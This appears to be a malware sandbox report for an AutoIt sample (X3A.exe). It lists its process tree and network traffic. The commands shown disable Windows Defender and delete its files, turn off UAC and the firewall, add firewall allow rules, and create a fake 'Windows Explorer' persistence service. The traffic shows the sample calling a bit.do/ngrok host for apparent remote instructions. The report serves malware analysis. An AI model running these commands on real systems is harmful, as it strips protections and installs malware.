- - C:\Windows\system32\reg.exe
    reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t "REG_DWORD" /d 1 /f
    3⤵
    PID:872
- - C:\Windows\system32\reg.exe
    reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t "REG_DWORD" /d 1 /f
    3⤵
    PID:1944
- - C:\Windows\system32\reg.exe
    reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t "REG_DWORD" /d 1 /f
    3⤵
    PID:1848
- - C:\Windows\system32\reg.exe
    reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d 1 /f
    3⤵
    PID:764
- - C:\Windows\system32\reg.exe
    reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t "REG_DWORD" /d 1 /f
    3⤵
    PID:1852
- - C:\Windows\system32\reg.exe
    reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t "REG_DWORD" /d 1 /f
    3⤵
    PID:1940
- - C:\Windows\system32\reg.exe
    reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t "REG_DWORD" /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1384
- - C:\Windows\system32\reg.exe
    reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t "REG_DWORD" /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1668
- - C:\Windows\system32\reg.exe
    reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t "REG_DWORD" /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1436
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell Set-MpPreference -DisableRealtimeMonitoring $true
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1648
- - C:\Windows\system32\reg.exe
    reg DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}" /va /f
    3⤵
    PID:1956
- - C:\Windows\system32\reg.exe
    reg DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /va /f
    3⤵
    PID:1924
- - C:\Users\Admin\AppData\Roaming\explorer\tweak.exe
    "C:\Users\Admin\AppData\Roaming\explorer\tweak.exe" /o /c Windows-Defender /r
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1744
- - C:\Windows\system32\sc.exe
    sc stop "vexplorer"
    3⤵
    - Launches sc.exe
    PID:1596
- - C:\Windows\system32\sc.exe
    sc config "vexplorer" binpath= "C:\Users\Admin\AppData\Roaming\explorer\X3A.exe /AutoIt3ExecuteScript \"C:\Users\Admin\AppData\Roaming\explorer\explorer.cfg\""
    3⤵
    - Launches sc.exe
    PID:980
- - C:\Windows\system32\reg.exe
    REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control" /v "ServicesPipeTimeout" /t "REG_DWORD" /d 864000000 /f
    3⤵
    PID:1640
- - C:\Windows\system32\sc.exe
    sc create "vexplorer" start= auto displayname= "Windows Explorer" binpath= "C:\Users\Admin\AppData\Roaming\explorer\X3A.exe /AutoIt3ExecuteScript \"C:\Users\Admin\AppData\Roaming\explorer\explorer.cfg\""
    3⤵
    - Launches sc.exe
    PID:1700
- - C:\Windows\system32\reg.exe
    REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vexplorer" /v "Description" /t "REG_SZ" /d "Windows explorer directory and files" /f
    3⤵
    PID:1420
- - C:\Windows\system32\reg.exe
    REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vexplorer\Parameters" /v "Application" /t "REG_SZ" /d "C:\Users\Admin\AppData\Roaming\explorer\X3A.exe /AutoIt3ExecuteScript \"C:\Users\Admin\AppData\Roaming\explorer\explorer.cfg\"" /f
    3⤵
    PID:1228
- - C:\Windows\system32\sc.exe
    sc config "vexplorer" start= auto
    3⤵
    - Launches sc.exe
    PID:1220
- - C:\Windows\system32\netsh.exe
    netsh firewall set notifications mode = disable profile = all
    3⤵
    - Modifies Windows Firewall
    PID:1280
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:1080
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall Delete rule name="lib"
    3⤵
    - Modifies Windows Firewall
    PID:364
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall Delete rule name="svchostt"
    3⤵
    - Modifies Windows Firewall
    PID:1076
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall Delete rule name="explorer"
    3⤵
    - Modifies Windows Firewall
    PID:1620
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall Delete rule name="X3A"
    3⤵
    - Modifies Windows Firewall
    PID:780
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="lib" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\explorer\lib.txt" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:1112
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="X3A" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\explorer\X3A.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:1248
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="explorer" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\explorer\explorer.cfg" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:1752
- - C:\Windows\system32\attrib.exe
    attrib +h /s /d *.*
    3⤵
    - Views/modifies file attributes
    PID:112
- - C:\Users\Admin\AppData\Roaming\explorer\X3A.exe
    X3A.exe /AutoIt3ExecuteScript explorer.cfg
    3⤵
    - Windows security bypass
    - Executes dropped EXE
    - Windows security modification
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Modifies system certificate store
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    PID:1604
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C sc stop "vexplorer"
      4⤵
      PID:276
    - - C:\Windows\system32\sc.exe
        
        sc stop "vexplorer"
        5⤵
        Launches sc.exe
        
        PID:1544
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C sc config "vexplorer" binpath= "%appdata%\explorer\X3A.exe /AutoIt3ExecuteScript \"%appdata%\explorer\explorer.cfg\""
      4⤵
      PID:1856
    - - C:\Windows\system32\sc.exe
        
        sc config "vexplorer" binpath= "C:\Users\Admin\AppData\Roaming\explorer\X3A.exe /AutoIt3ExecuteScript \"C:\Users\Admin\AppData\Roaming\explorer\explorer.cfg\""
        5⤵
        Launches sc.exe
        
        PID:588
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control" /v "ServicesPipeTimeout" /t "REG_DWORD" /d 864000000 /f
      4⤵
      PID:860
    - - C:\Windows\system32\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control" /v "ServicesPipeTimeout" /t "REG_DWORD" /d 864000000 /f
        5⤵
        
        PID:1140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C sc create "vexplorer" start= delayed-auto displayname= "Windows Explorer" binpath= "%appdata%\explorer\X3A.exe /AutoIt3ExecuteScript \"%appdata%\explorer\explorer.cfg\""
      4⤵
      PID:1280
    - - C:\Windows\system32\sc.exe
        
        sc create "vexplorer" start= delayed-auto displayname= "Windows Explorer" binpath= "C:\Users\Admin\AppData\Roaming\explorer\X3A.exe /AutoIt3ExecuteScript \"C:\Users\Admin\AppData\Roaming\explorer\explorer.cfg\""
        5⤵
        Launches sc.exe
        
        PID:1148
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vexplorer" /v "Description" /t "REG_SZ" /d "Windows explorer directory and files" /f
      4⤵
      PID:1688
    - - C:\Windows\system32\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vexplorer" /v "Description" /t "REG_SZ" /d "Windows explorer directory and files" /f
        5⤵
        
        PID:876
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vexplorer\Parameters" /v "Application" /t "REG_SZ" /d "%appdata%\explorer\X3A.exe /AutoIt3ExecuteScript \"%appdata%\explorer\explorer.cfg\"" /f
      4⤵
      PID:568
    - - C:\Windows\system32\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vexplorer\Parameters" /v "Application" /t "REG_SZ" /d "C:\Users\Admin\AppData\Roaming\explorer\X3A.exe /AutoIt3ExecuteScript \"C:\Users\Admin\AppData\Roaming\explorer\explorer.cfg\"" /f
        5⤵
        
        PID:1720
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C sc config "vexplorer" start= delayed-auto
      4⤵
      PID:1628
    - - C:\Windows\system32\sc.exe
        
        sc config "vexplorer" start= delayed-auto
        5⤵
        Launches sc.exe
        
        PID:1900
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t "REG_DWORD" /d 0 /f
      4⤵
      PID:524
    - - C:\Windows\system32\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t "REG_DWORD" /d 0 /f
        5⤵
        UAC bypass
        
        PID:1620
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v HideSystray /t "REG_DWORD" /d 1 /f
      4⤵
      PID:1936
    - - C:\Windows\system32\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v HideSystray /t "REG_DWORD" /d 1 /f
        5⤵
        
        PID:964
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t "REG_DWORD" /d 1 /f
      4⤵
      PID:780
    - - C:\Windows\system32\reg.exe
        
        REG ADD "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t "REG_DWORD" /d 1 /f
        5⤵
        
        PID:1692
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C Powershell Set-MpPreference -DisableRealtimeMonitoring $true
      4⤵
      PID:1564
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell Set-MpPreference -DisableRealtimeMonitoring $true
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1768
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d 1 /f
      4⤵
      PID:1092
    - - C:\Windows\system32\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d 1 /f
        5⤵
        
        PID:596
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t "REG_DWORD" /d 1 /f
      4⤵
      PID:1964
    - - C:\Windows\system32\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t "REG_DWORD" /d 1 /f
        5⤵
        
        PID:1544
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t "REG_DWORD" /d 1 /f
      4⤵
      PID:1660
    - - C:\Windows\system32\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t "REG_DWORD" /d 1 /f
        5⤵
        
        PID:1072
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t "REG_DWORD" /d 1 /f
      4⤵
      PID:1548
    - - C:\Windows\system32\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t "REG_DWORD" /d 1 /f
        5⤵
        
        PID:1476
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t "REG_DWORD" /d 1 /f
      4⤵
      PID:1728
    - - C:\Windows\system32\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t "REG_DWORD" /d 1 /f
        5⤵
        
        PID:1784
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t "REG_DWORD" /d 1 /f
      4⤵
      PID:1528
    - - C:\Windows\system32\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t "REG_DWORD" /d 1 /f
        5⤵
        
        PID:1280
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d 1 /f
      4⤵
      PID:1312
    - - C:\Windows\system32\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d 1 /f
        5⤵
        
        PID:1688
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t "REG_DWORD" /d 1 /f
      4⤵
      PID:1960
    - - C:\Windows\system32\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t "REG_DWORD" /d 1 /f
        5⤵
        
        PID:568
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t "REG_DWORD" /d 1 /f
      4⤵
      PID:548
    - - C:\Windows\system32\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t "REG_DWORD" /d 1 /f
        5⤵
        
        PID:1180
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t "REG_DWORD" /d 1 /f
      4⤵
      PID:1600
    - - C:\Windows\system32\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t "REG_DWORD" /d 1 /f
        5⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:1576
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t "REG_DWORD" /d 1 /f
      4⤵
      PID:584
    - - C:\Windows\system32\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t "REG_DWORD" /d 1 /f
        5⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:1920
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t "REG_DWORD" /d 1 /f
      4⤵
      PID:1324
    - - C:\Windows\system32\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t "REG_DWORD" /d 1 /f
        5⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:1268
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C sc config WinDefend start= disabled
      4⤵
      PID:1944
    - - C:\Windows\system32\sc.exe
        
        sc config WinDefend start= disabled
        5⤵
        Launches sc.exe
        
        PID:1748
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C sc stop windefend
      4⤵
      PID:1436
    - - C:\Windows\system32\sc.exe
        
        sc stop windefend
        5⤵
        Launches sc.exe
        
        PID:1248
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C sc delete windefend
      4⤵
      PID:1668
    - - C:\Windows\system32\sc.exe
        
        sc delete windefend
        5⤵
        Launches sc.exe
        
        PID:1940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}" /va /f
      4⤵
      PID:1764
    - - C:\Windows\system32\reg.exe
        
        REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}" /va /f
        5⤵
        
        PID:112
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /va /f
      4⤵
      PID:776
    - - C:\Windows\system32\reg.exe
        
        REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /va /f
        5⤵
        
        PID:1368
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C DEL /F /S /Q "C:\ProgramData\Microsoft\Windows Defender"
      4⤵
      PID:1524
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C DEL /F /S /Q "C:\Program Files (x86)\Windows Defender"
      4⤵
      PID:276
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C DEL /F /S /Q "C:\Program Files\Windows Defender"
      4⤵
      PID:1476
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C netsh firewall set notifications mode = disable profile = all
      4⤵
      PID:1004
    - - C:\Windows\system32\netsh.exe
        
        netsh firewall set notifications mode = disable profile = all
        5⤵
        Modifies Windows Firewall
        
        PID:860
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C netsh advfirewall set allprofiles state off
      4⤵
      PID:1316
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        5⤵
        Modifies Windows Firewall
        
        PID:1312
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C netsh advfirewall firewall Delete rule name="FTP1"
      4⤵
      PID:836
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall Delete rule name="FTP1"
        5⤵
        Modifies Windows Firewall
        
        PID:1512
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C netsh advfirewall firewall Delete rule name="FTP2"
      4⤵
      PID:1600
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall Delete rule name="FTP2"
        5⤵
        Modifies Windows Firewall
        
        PID:1976
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C netsh advfirewall firewall Delete rule name="lib"
      4⤵
      PID:700
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall Delete rule name="lib"
        5⤵
        Modifies Windows Firewall
        
        PID:1796
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C netsh advfirewall firewall Delete rule name="explorer"
      4⤵
      PID:560
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall Delete rule name="explorer"
        5⤵
        Modifies Windows Firewall
        
        PID:1384
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C netsh advfirewall firewall Delete rule name="X3A"
      4⤵
      PID:1264
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall Delete rule name="X3A"
        5⤵
        Modifies Windows Firewall
        
        PID:1764
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C netsh advfirewall firewall add rule name="FTP1" dir=in action=allow program="C:\Windows\system32\ftp.exe" enable=yes
      4⤵
      PID:1596
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="FTP1" dir=in action=allow program="C:\Windows\system32\ftp.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:1072
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C netsh advfirewall firewall add rule name="FTP2" dir=in action=allow program="C:\Windows\system32\ftp.exe" enable=yes
      4⤵
      PID:980
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="FTP2" dir=in action=allow program="C:\Windows\system32\ftp.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:1148
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C netsh advfirewall firewall add rule name="lib" dir=in action=allow program="%appdata%\explorer\lib.txt" enable=yes
      4⤵
      PID:1728
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="lib" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\explorer\lib.txt" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:956
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C netsh advfirewall firewall add rule name="X3A" dir=in action=allow program="%appdata%\explorer\X3A.exe" enable=yes
      4⤵
      PID:1520
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="X3A" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\explorer\X3A.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:188
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C netsh advfirewall firewall add rule name="explorer" dir=in action=allow program="%appdata%\explorer\explorer.cfg" enable=yes
      4⤵
      PID:1296
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="explorer" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\explorer\explorer.cfg" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:584

Network

DNS

google.com

X3A.exe

Remote address:

8.8.8.8:53

Request

google.com

IN A

Response

google.com

IN A

142.250.179.142
GET

https://google.com/

X3A.exe

Remote address:

142.250.179.142:443

Request

GET / HTTP/1.1
User-Agent: AutoIt
Host: google.com
Cache-Control: no-cache

Response

HTTP/1.1 301 Moved Permanently

Location: https://www.google.com/
Content-Type: text/html; charset=UTF-8
Cross-Origin-Opener-Policy-Report-Only: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
Date: Mon, 05 Dec 2022 09:01:46 GMT
Expires: Mon, 05 Dec 2022 09:01:46 GMT
Cache-Control: private, max-age=2592000
Server: gws
Content-Length: 220
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: CONSENT=PENDING+571; expires=Wed, 04-Dec-2024 09:01:46 GMT; path=/; domain=.google.com; Secure
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
DNS

bit.do

X3A.exe

Remote address:

8.8.8.8:53

Request

bit.do

IN A

Response

bit.do

IN A

23.21.31.78
GET

http://bit.do/hostonline

X3A.exe

Remote address:

23.21.31.78:80

Request

GET /hostonline HTTP/1.1
User-Agent: AutoIt
Host: bit.do
Cache-Control: no-cache

Response

HTTP/1.1 301 Moved Permanently

Date: Mon, 05 Dec 2022 09:01:48 GMT
Server: Apache/2.4.52 (Ubuntu)
Location: http://a508-123-20-120-98.ngrok.io/host.txt
Content-Length: 323
Content-Type: text/html; charset=iso-8859-1
GET

http://bit.do/hostonline

X3A.exe

Remote address:

23.21.31.78:80

Request

GET /hostonline HTTP/1.1
User-Agent: AutoIt
Host: bit.do
Cache-Control: no-cache

Response

HTTP/1.1 301 Moved Permanently

Date: Mon, 05 Dec 2022 09:01:50 GMT
Server: Apache/2.4.52 (Ubuntu)
Location: http://a508-123-20-120-98.ngrok.io/host.txt
Content-Length: 323
Content-Type: text/html; charset=iso-8859-1
GET

http://bit.do/hostonline

X3A.exe

Remote address:

23.21.31.78:80

Request

GET /hostonline HTTP/1.1
User-Agent: AutoIt
Host: bit.do
Cache-Control: no-cache

Response

HTTP/1.1 301 Moved Permanently

Date: Mon, 05 Dec 2022 09:01:50 GMT
Server: Apache/2.4.52 (Ubuntu)
Location: http://a508-123-20-120-98.ngrok.io/host.txt
Content-Length: 323
Content-Type: text/html; charset=iso-8859-1
DNS

a508-123-20-120-98.ngrok.io

X3A.exe

Remote address:

8.8.8.8:53

Request

a508-123-20-120-98.ngrok.io

IN A

Response

a508-123-20-120-98.ngrok.io

IN A

3.14.182.203
GET

http://a508-123-20-120-98.ngrok.io/host.txt

X3A.exe

Remote address:

3.14.182.203:80

Request

GET /host.txt HTTP/1.1
User-Agent: AutoIt
Connection: Keep-Alive
Cache-Control: no-cache
Host: a508-123-20-120-98.ngrok.io

Response

HTTP/1.1 307 Temporary Redirect

Content-Type: text/html; charset=utf-8
Location: https://a508-123-20-120-98.ngrok.io/host.txt
Ngrok-Trace-Id: b5183359e52fe3e436181220097511ea
Date: Mon, 05 Dec 2022 09:01:48 GMT
Content-Length: 80
GET

http://a508-123-20-120-98.ngrok.io/host.txt

X3A.exe

Remote address:

3.14.182.203:80

Request

GET /host.txt HTTP/1.1
User-Agent: AutoIt
Connection: Keep-Alive
Cache-Control: no-cache
Host: a508-123-20-120-98.ngrok.io

Response

HTTP/1.1 307 Temporary Redirect

Content-Type: text/html; charset=utf-8
Location: https://a508-123-20-120-98.ngrok.io/host.txt
Ngrok-Trace-Id: 2473163565fb97795eddaa0bcbb2422a
Date: Mon, 05 Dec 2022 09:01:50 GMT
Content-Length: 80
GET

http://a508-123-20-120-98.ngrok.io/host.txt

X3A.exe

Remote address:

3.14.182.203:80

Request

GET /host.txt HTTP/1.1
User-Agent: AutoIt
Connection: Keep-Alive
Cache-Control: no-cache
Host: a508-123-20-120-98.ngrok.io

Response

HTTP/1.1 307 Temporary Redirect

Content-Type: text/html; charset=utf-8
Location: https://a508-123-20-120-98.ngrok.io/host.txt
Ngrok-Trace-Id: 714df4f0ba82eff632aa55dd1697bca6
Date: Mon, 05 Dec 2022 09:01:51 GMT
Content-Length: 80
GET

https://a508-123-20-120-98.ngrok.io/host.txt

X3A.exe

Remote address:

3.14.182.203:443

Request

GET /host.txt HTTP/1.1
User-Agent: AutoIt
Connection: Keep-Alive
Cache-Control: no-cache
Host: a508-123-20-120-98.ngrok.io

Response

HTTP/1.1 404 Not Found

Connection: close
Content-Type: text/plain
Ngrok-Error-Code: ERR_NGROK_3200
Ngrok-Trace-Id: 41d0feef31363d83823db3bd858bbc79
Date: Mon, 05 Dec 2022 09:01:49 GMT
Content-Length: 64
DNS

apps.identrust.com

X3A.exe

Remote address:

8.8.8.8:53

Request

apps.identrust.com

IN A

Response

